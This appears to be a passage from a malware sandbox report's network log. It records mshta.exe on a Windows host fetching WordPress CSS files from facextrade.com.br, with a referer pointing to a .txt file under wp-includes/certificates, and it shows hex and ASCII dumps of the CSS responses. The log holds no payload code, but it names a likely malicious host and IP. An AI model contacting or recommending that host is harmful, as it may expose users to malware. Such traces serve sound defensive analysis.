                                        Data Ascii: d(0,0,0); } 40%, 43% { -webkit-animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); -webkit-transform: translate3d(0, -
                                        Aug 16, 2022 10:48:47.206010103 CEST537INData Raw: 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 35 35 2c 20 30 2e 30 35 30 2c 20 30 2e 38 35 35 2c 20 30 2e 30 36 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 61 6e 69
                                        Data Ascii: -animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); animation-timing-function: cubic-bezier(0.755, 0.050, 0.855, 0.060); -webkit-transform: translate3d(0, -15px, 0); transform: translate3d(0, -15px,
                                        Aug 16, 2022 10:48:47.206156015 CEST539INData Raw: 6d 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2c 20 31 2c 20 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2c 20 31
                                        Data Ascii: m { -webkit-transform: scale3d(1, 1, 1); transform: scale3d(1, 1, 1); } 50% { -webkit-transform: scale3d(1.05, 1.05, 1.05); transform: scale3d(1.05, 1.05, 1.05); } to { -webk
                                        Aug 16, 2022 10:48:47.206247091 CEST540INData Raw: 31 2c 20 31 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 33 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2e 32 35 2c 20 30 2e 37 35 2c 20 31 29 3b 0d 0a 20 20
                                        Data Ascii: 1, 1); } 30% { -webkit-transform: scale3d(1.25, 0.75, 1); transform: scale3d(1.25, 0.75, 1); } 40% { -webkit-transform: scale3d(0.75, 1.25, 1); transform: scale3d(0.75, 1.25, 1);
                                        Aug 16, 2022 10:48:47.206360102 CEST541INData Raw: 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 31 30 25 2c 20 33 30 25 2c 20 35 30 25 2c 20 37 30 25 2c 20 39 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64
                                        Data Ascii: ); } 10%, 30%, 50%, 70%, 90% { -webkit-transform: translate3d(-10px, 0, 0); transform: translate3d(-10px, 0, 0); } 20%, 40%, 60%, 80% { -webkit-transform: translate3d(10px, 0, 0); tra
                                        Aug 16, 2022 10:48:47.206475973 CEST543INData Raw: 6d 3a 20 72 6f 74 61 74 65 33 64 28 30 2c 20 30 2c 20 31 2c 20 35 64 65 67 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 38 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65
                                        Data Ascii: m: rotate3d(0, 0, 1, 5deg); } 80% { -webkit-transform: rotate3d(0, 0, 1, -5deg); transform: rotate3d(0, 0, 1, -5deg); } to { -webkit-transform: rotate3d(0, 0, 1, 0deg); transform: rot
                                        Aug 16, 2022 10:48:47.206643105 CEST544INData Raw: 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 2e 39 2c 20 2e 39 2c 20 2e 39 29 20 72 6f 74 61 74 65 33 64 28 30 2c 20 30 2c 20 31 2c 20 2d 33 64 65 67 29 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73
                                        Data Ascii: -webkit-transform: scale3d(.9, .9, .9) rotate3d(0, 0, 1, -3deg); transform: scale3d(.9, .9, .9) rotate3d(0, 0, 1, -3deg); } 30%, 50%, 70%, 90% { -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg)
                                        Aug 16, 2022 10:48:47.206756115 CEST546INData Raw: 6f 74 61 74 65 33 64 28 30 2c 20 30 2c 20 31 2c 20 2d 33 64 65 67 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 36 30 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65
                                        Data Ascii: otate3d(0, 0, 1, -3deg); } 60% { -webkit-transform: translate3d(10%, 0, 0) rotate3d(0, 0, 1, 2deg); transform: translate3d(10%, 0, 0) rotate3d(0, 0, 1, 2deg); } 75% { -webkit-transform: transl
                                        Aug 16, 2022 10:48:47.206962109 CEST547INData Raw: 2c 20 30 29 20 72 6f 74 61 74 65 33 64 28 30 2c 20 30 2c 20 31 2c 20 2d 31 64 65 67 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65
                                        Data Ascii: , 0) rotate3d(0, 0, 1, -1deg); } to { -webkit-transform: none; transform: none; }}.wobble { -webkit-animation-name: wobble; animation-name: wobble;}@-webkit-keyframes jello { from,
                                        Aug 16, 2022 10:48:47.445944071 CEST555INData Raw: 20 6a 65 6c 6c 6f 20 7b 0d 0a 20 20 20 20 66 72 6f 6d 2c 20 31 31 2e 31 25 2c 20 74 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f
                                        Data Ascii: jello { from, 11.1%, to { -webkit-transform: none; transform: none; } 22.2% { -webkit-transform: skewX(-12.5deg) skewY(-12.5deg); transform: skewX(-12.5deg) skewY(-12.5deg); } 3


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        16192.168.2.2249191187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:46.971838951 CEST533OUTGET /wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.css?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:47.213962078 CEST547INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:47 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 10 Aug 2021 23:54:27 GMT
                                        ETag: "a50ba8-14fc-5c93d38d8b229"
                                        Accept-Ranges: bytes
                                        Content-Length: 5372
                                        Connection: close
                                        Content-Type: text/css
                                        Aug 16, 2022 10:48:47.214133978 CEST549INData Raw: 2f 2a 2a 0a 20 2a 20 41 6c 6c 20 6f 66 20 74 68 65 20 43 53 53 20 66 6f 72 20 79 6f 75 72 20 70 75 62 6c 69 63 2d 66 61 63 69 6e 67 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 73 68 6f 75 6c 64 20 62 65 0a 20 2a 20 69 6e 63 6c 75 64 65 64 20 69
                                        Data Ascii: /** * All of the CSS for your public-facing functionality should be * included in this file. */.lgx-logo-slider-wp .owl-stage { display: flex; align-items: center;}.lgx-logo-slider-wp .lgx-logo-wrapper { padding: 25px 0;}.lg
                                        Aug 16, 2022 10:48:47.214155912 CEST550INData Raw: 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 74 6f 70 3a 20 32 35 25 3b 0a 20 20 7a 2d 69 6e 64 65 78 3a 20 32 3b 0a 7d 0a 2e 6c 67 78 2d 6c 6f 67 6f 2d 73 6c 69 64 65 72 2d 77 70 20 2e 6e 61 76 2d 70 6f 73 69 74 69
                                        Data Ascii: position: absolute; top: 25%; z-index: 2;}.lgx-logo-slider-wp .nav-position-v-mid .owl-next { right: 0;}.lgx-logo-slider-wp .nav-position-v-mid .owl-prev { left: 0;}.lgx-logo-slider-wp .nav-position-v-mid-hover { position: r
                                        Aug 16, 2022 10:48:47.214298964 CEST552INData Raw: 20 20 2d 77 65 62 6b 69 74 2d 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 2d 6d 73 2d 66 69 6c 74 65 72 3a 20 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66
                                        Data Ascii: -webkit-opacity: 1; opacity: 1; -ms-filter: progid:DXImageTransform.Microsoft.Alpha(opacity=100); filter: alpha(opacity=100); filter: none; -webkit-filter: grayscale(0); -moz-filter: grayscale(0); -o-filter: grayscale(0); -ms
                                        Aug 16, 2022 10:48:47.214391947 CEST553INData Raw: 61 6c 75 65 73 3d 5c 27 30 2e 33 33 33 33 20 30 2e 33 33 33 33 20 30 2e 33 33 33 33 20 30 20 30 20 30 2e 33 33 33 33 20 30 2e 33 33 33 33 20 30 2e 33 33 33 33 20 30 20 30 20 30 2e 33 33 33 33 20 30 2e 33 33 33 33 20 30 2e 33 33 33 33 20 30 20 30
                                        Data Ascii: alues=\'0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0\'/></filter></svg>#grayscale"); -webkit-filter: grayscale(100%); -moz-filter: grayscale(100%); -o-filter: grayscale(100%); -ms-filter: graysca
                                        Aug 16, 2022 10:48:47.214586020 CEST553INData Raw: 77 70 2d 70 75 62 6c 69 63 2e 63 73 73 2e 6d 61 70 20 2a 2f
                                        Data Ascii: wp-public.css.map */


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        17192.168.2.2249192187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:47.748437881 CEST627OUTGET /wp-content/themes/theme51253/main-style.css HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:47.976603985 CEST629INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:43 GMT
                                        Server: Apache
                                        ETag: "a53765-1130b-5cd2be5c3c8aa"
                                        Last-Modified: Thu, 30 Sep 2021 00:55:05 GMT
                                        Content-Length: 70411
                                        Content-Type: text/css
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 23824860 15362768
                                        Age: 64
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 22 2e 2e 2f 43 68 65 72 72 79 46 72 61 6d 65 77 6f 72 6b 2f 73 74 79 6c 65 2e 63 73 73 22 29 3b 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 31 30 30 29 3b 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 33 30 30 29 3b 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 29 3b 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 37 30 30 29 3b 0a 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 39 30 30 29 3b 0a 2e 77 72 61 70 20 7b 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 20 7d 0a 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 20 7d 0a 68 32 20 7b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 31 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 3b 0a 7d 0a 68 32 20 73 74 72 6f 6e 67 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0a 68 33 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 39 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0a 61 20 7b 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 2e 35 73 20 65 61 73 65 3b 0a 09 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 2e 35 73 20 65 61 73 65 3b 0a 09 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 2e 35 73 20 65 61 73 65 3b 0a 09 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 2e 35 73 20 65 61 73 65 3b 0a 7d 0a 61 3a 68 6f 76 65 72 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 20 7d 0a 2e 68 65 61 64 65 72 20 7b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 32 33 70 78 20 30 20 32 30 70 78 3b 0a 09 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 09 2e 68 65 61 64 65 72 20 7b 0a 09 09 77 69 64 74 68 3a 61 75 74 6f 3b 0a 09 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 0a 09 09 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 7d 0a 2e 68 65 61 64 65 72 3a 61 66 74 65 72 20 7b 0a 09 63 6f 6e 74 65 6e 74 3a 27 27 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a
                                        Data Ascii: @import url("../CherryFramework/style.css");@import url(//fonts.googleapis.com/css?family=Lato:100);@import url(//fonts.googleapis.com/css?family=Lato:300);@import url(//fonts.googleapis.com/css?family=Lato:400);@import url(//fonts.googleapis.com/css?family=Lato:700);@import url(//fonts.googleapis.com/css?family=Lato:900);.wrap { overflow:hidden; }h1, h2, h3, h4, h5, h6 { margin-top:0; }h2 {font-weight:100 !important;text-shadow:0 0 0 rgba(0,0,0,0);}h2 strong { font-weight:900 !important; }h3 { font-weight:900 !important; }a {-webkit-transition:all 0.5s ease;-moz-transition:all 0.5s ease;-o-transition:all 0.5s ease;transition:all 0.5s ease;}a:hover { text-decoration:none; }.header {width:100%;position:absolute;top:0;padding:23px 0 20px;border:none;background:#fff;}@media (max-width: 767px) {.header {width:auto;padding-left:20px;padding-right:20px;position:relative !important;}}.header:after {content:'';position:
                                        Aug 16, 2022 10:48:47.976674080 CEST630INData Raw: 61 62 73 6f 6c 75 74 65 3b 0a 09 62 6f 74 74 6f 6d 3a 2d 31 33 70 78 3b 0a 09 6c 65 66 74 3a 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 09 68 65 69 67 68 74 3a 31 33 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65
                                        Data Ascii: absolute;bottom:-13px;left:0;width:100%;height:13px;background-repeat:repeat-x;background-image:url(images/header-bottom.png);}@media (max-width: 767px) {.header.isStuck { top:0 !important; }}.header.isStuck .logo a img {wi
                                        Aug 16, 2022 10:48:47.976726055 CEST631INData Raw: 20 30 2e 35 73 20 65 61 73 65 3b 0a 7d 0a 2e 68 65 61 64 65 72 20 6e 61 76 2e 6e 61 76 5f 5f 70 72 69 6d 61 72 79 20 2e 73 66 2d 6d 65 6e 75 20 3e 6c 69 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 0a 09 70 6f 73 69 74 69 6f 6e 3a
                                        Data Ascii: 0.5s ease;}.header nav.nav__primary .sf-menu >li {background:none;position:relative;float:left;display:inline-block;margin-right:30px;}.header nav.nav__primary .sf-menu >li >a {text-transform:uppercase;font-weight:700;bord
                                        Aug 16, 2022 10:48:47.976811886 CEST633INData Raw: 6c 6f 72 3a 23 66 66 66 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 31 62 65 65 38 3b 0a 7d 0a 2e 68 65 61 64 65 72 20 6e 61 76 2e 6e 61 76 5f 5f 70 72 69 6d 61 72 79 20 2e 73 66 2d 6d 65 6e 75 20 3e 6c 69 20 2e 73 75 62 2d 6d 65 6e 75 20 6c
                                        Data Ascii: lor:#fff;background:#21bee8;}.header nav.nav__primary .sf-menu >li .sub-menu li.menu-item-has-children > a:before {width:8px;height:40px;position:absolute;top:0;right:-8px;display:block;background:url("images/extra1.png") cen
                                        Aug 16, 2022 10:48:47.976872921 CEST634INData Raw: 72 69 67 68 74 3a 36 35 70 78 3b 0a 09 7d 0a 7d 0a 2e 62 74 6e 3a 68 6f 76 65 72 20 7b 0a 09 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 33 33 33 33 33 3b 0a 09 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f
                                        Data Ascii: right:65px;}}.btn:hover {color:#fff;background:#333333;-webkit-transition:all 0.5s ease;-moz-transition:all 0.5s ease;-o-transition:all 0.5s ease;transition:all 0.5s ease;}.btn:active {color:#fff;background:none;}.btn:f
                                        Aug 16, 2022 10:48:47.976959944 CEST636INData Raw: 61 64 64 69 6e 67 3a 31 36 70 78 20 35 35 70 78 3b 0a 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 0a 09 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 33 39 63 31 32 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 0a
                                        Data Ascii: adding:16px 55px;text-shadow:none;border:1px solid #f39c12;box-shadow:none;text-shadow:none !important;-webkit-transition:all 0.5s ease;-moz-transition:all 0.5s ease;-o-transition:all 0.5s ease;transition:all 0.5s ease;}.rev_
                                        Aug 16, 2022 10:48:47.976988077 CEST637INData Raw: 6e 6f 6e 65 3b 0a 09 70 61 64 64 69 6e 67 3a 31 36 70 78 20 38 35 70 78 3b 0a 7d 0a 2e 6d 6f 72 65 62 74 6e 36 3a 68 6f 76 65 72 20 7b 0a 09 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 09 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 32 31 62 65
                                        Data Ascii: none;padding:16px 85px;}.morebtn6:hover {color:#fff;border:1px solid #21bee8;background:#21bee8;}.cherry_media_parallax_1 {opacity:0;filter:alpha(opacity=0);}.cherry_media_parallax_1 .parallax-content { padding:365px 0 250px
                                        Aug 16, 2022 10:48:47.977016926 CEST639INData Raw: 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 2e 35 73 20 65 61 73 65 3b 0a 09 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30 2e 35 73 20 65 61 73 65 3b 0a 09 2d 6f 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 30
                                        Data Ascii: kit-transition:all 0.5s ease;-moz-transition:all 0.5s ease;-o-transition:all 0.5s ease;transition:all 0.5s ease;}.cherry_media_parallax_1 .parallax_inner:before { display:none !important; }.cherry_fixed_parallax1 { overflow:hidden; }
                                        Aug 16, 2022 10:48:47.977047920 CEST640INData Raw: 66 69 78 65 64 5f 70 61 72 61 6c 6c 61 78 34 20 2e 70 61 72 61 6c 6c 61 78 2d 63 6f 6e 74 65 6e 74 20 68 33 20 7b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0a 09 63 6f 6c
                                        Data Ascii: fixed_parallax4 .parallax-content h3 {margin-bottom:15px;text-align:left;color:#fff;}.cherry_fixed_parallax4 .parallax-content p { text-align:left; }.cherry_fixed_parallax4 .parallax-content .icon_type1 {margin:0 30px 38px 0;backg
                                        Aug 16, 2022 10:48:47.977133989 CEST641INData Raw: 6e 2d 62 6f 74 74 6f 6d 3a 35 33 70 78 3b 0a 09 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 0a 7d 0a 2e 63 68 65 72 72 79 5f 66 69 78 65 64 5f 70 61 72 61 6c 6c 61 78 37 20 2e 70 61 72 61 6c 6c 61 78 2d 63 6f 6e 74 65 6e 74 20 2e 6d 6f 72 65 62 74
                                        Data Ascii: n-bottom:53px;color:inherit;}.cherry_fixed_parallax7 .parallax-content .morebtn6 {margin-top:50px;padding-left:90px;padding-right:90px;}.cherry_fixed_parallax8 .parallax-content {text-align:center;padding:60px 0 70px 0;}.cher
                                        Aug 16, 2022 10:48:48.204875946 CEST653INData Raw: 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 39 70 78 3b 20 7d 0a 2e 65 78 74 72 61 5f 77 72 61 70 33 20 75 6c 20 6c 69 20 61 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 0a 09 63 6f
                                        Data Ascii: argin-bottom:9px; }.extra_wrap3 ul li a {font-size:14px;line-height:20px;color:#2ecc71;text-transform:uppercase;}.extra_wrap3 ul li a:hover { color:#fff; }.extra_wrap4 h3 { margin-bottom:30px; }.extra_wrap4 ul {margin:0;list-s
                                        Aug 16, 2022 10:48:48.436167955 CEST714OUTGET /wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.8 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:48.668483019 CEST718INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:48 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 02 Apr 2019 21:37:34 GMT
                                        ETag: "a5169a-156c1-58592f1eb4380"
                                        Accept-Ranges: bytes
                                        Content-Length: 87745
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2e 6d 6f 74 6f 70 72 65 73 73 2d 74 65 78 74 2d 6f 62 6a 20 73 70 61 6e 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 6f 62 6a 20 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 6f 62 6a 2d 62 61 73 69 63 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 30 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2e 73 6c 69 64 65 73 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 20 6f 75 74 73 69 64 65 20 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2e 73 6c 69 64 65 73 20 6c 69 7b 6d 61 72 67 69 6e 3a 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2e 73 6c 69 64 65 73 20 6c 69 3a 62 65 66 6f 72 65 2c 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2e 73 6c 69 64 65 73 20 6c 69 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2e 73 6c 69 64 65 73 20 6c 69 20 69 6d 67 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 30 7d 2e 6d 6f 74 6f 70 72 65 73 73 2d 69 6d 61 67 65 2d 73 6c 69 64 65 72 2d 6f 62 6a 20 2e 66 6c 65 78 2d 63 6f 6e 74 72 6f 6c 2d 6e 61 76 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 20 6f 75 74 73 69 64 65 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 72 69 67 68 74 3a 61 75 74 6f 20 21 69 6d 70 6f 72 